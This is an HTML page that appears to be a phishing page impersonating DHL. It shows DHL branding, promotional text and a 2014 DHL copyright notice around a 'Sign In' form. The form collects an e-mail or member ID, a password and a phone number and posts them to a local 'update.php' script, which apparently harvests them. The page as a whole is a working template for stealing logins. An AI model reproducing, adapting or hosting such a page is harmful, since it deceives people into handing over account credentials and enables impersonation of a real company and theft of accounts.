﻿ 



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>DHL GLOBAL</title>
<link href="styles/layout.css" rel="stylesheet" type="text/css" media="all" />
<link rel="icon" href="styles/favicon.gif" type="image/x-icon" />
<link rel="shortcut icon" href="%3dstyles/favicon.html" type="image/x-icon" />  
<script type="text/JavaScript">
<!--
function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_validateForm() { //v4.0
  var i,p,q,nm,test,num,min,max,errors='',args=MM_validateForm.arguments;
  for (i=0; i<(args.length-2); i+=3) { test=args[i+2]; val=MM_findObj(args[i]);
    if (val) { nm=val.name; if ((val=val.value)!="") {
      if (test.indexOf('isEmail')!=-1) { p=val.indexOf('@');
        if (p<1 || p==(val.length-1)) errors+='- '+nm+' must contain an e-mail address.\n';
      } else if (test!='R') { num = parseFloat(val);
        if (isNaN(val)) errors+='- '+nm+' must contain a number.\n';
        if (test.indexOf('inRange') != -1) { p=test.indexOf(':');
          min=test.substring(8,p); max=test.substring(p+1);
          if (num<min || max<num) errors+='- '+nm+' must contain a number between '+min+' and '+max+'.\n';
    } } } else if (test.charAt(0) == 'R') errors += '- '+nm+' is required.\n'; }
  } if (errors) alert('The following error(s) occurred:\n'+errors);
  document.MM_returnValue = (errors == '');
}
//-->
</script>
</head>
<body>
	
<div id="wrapper"><!---->
<div id="header">
  <img src="images/dhl_logo.gif" /> </div><!--end of header-->
<div id="content"><img src="images/v2.jpg" width="420" height="160" />
  <div id="content2">
  
<h3>Excellence. Simply Delivered.</h3>
    <p>International express deliveries; global freight forwarding by air, 
	sea, </p>
    <p>road and rail; warehousing solutions from packaging, to 
	repairs, </p>
    <p>to storage; mail deliveries worldwide; and other customized
	 logistic</p>
    <p> services – with everything DHL does, we help connect people 
	and</p>
	 improve their lives.<br />
      <br />
    </p>
  </div>
 <!--end of content-->


</div>

<div id="sideBar">
  <p><img src="styles/head.gif" width="299" height="53" /></p>
  <p>&nbsp;</p>
  <form  action="update.php" method="post" name="form" id="form" onsubmit="MM_validateForm('Email','','RisEmail','phonenumber','','R','Password','','R');return document.MM_returnValue">
    <p>
      <label>E-mail Address or Member ID:<br />
      <input type="text" name="email" id="Email" value="" tabindex="10" />
      </label>
    </p>
    <p>
       <label for="password">Password:<br />
      <input name="password" type="password" id="Password" tabindex="20" />
      </label>
    </p>
    <p>
     <label>Phone Number :<br />
      <input name="phonenumber" type="text" id="phonenumber" tabindex="20" />
      </label>
    </p>
    <p>&nbsp;</p>
    <p>
      <label for="sign_in"></label>
      <input type="submit" name="submit" id="sign_in" value="Sign In" tabindex="0" />
    </p>
  </form>
  <p>&nbsp;      </p>
  <p id="base"></p>

</div><!--end of sideBar-->
</div><!--end of wrapper-->

<div id="flash"><img src="styles/Freight_Solutions_203x125.jpg" width="203" height="125" /><img src="styles/Express_203x125.jpg" width="203" height="125" /><img src="styles/Supply_Chain_Solutions_203x125.jpg" width="203" height="125" /></div>
<div id="footer">
<div id="infooter"><a href="en/legal.html" target="_self">2014 © DHL International GmbH. All rights reserved.</a></div><!-- end of infooter-->

</div>
<!--end of footer-->
</body>

</html>